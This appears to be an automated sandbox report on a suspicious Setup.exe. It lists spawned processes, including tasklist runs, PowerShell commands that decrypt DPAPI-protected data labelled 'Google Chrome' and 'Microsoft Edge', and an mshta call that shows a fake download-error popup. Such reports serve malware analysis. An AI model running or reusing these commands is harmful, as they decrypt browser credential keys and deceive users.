Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
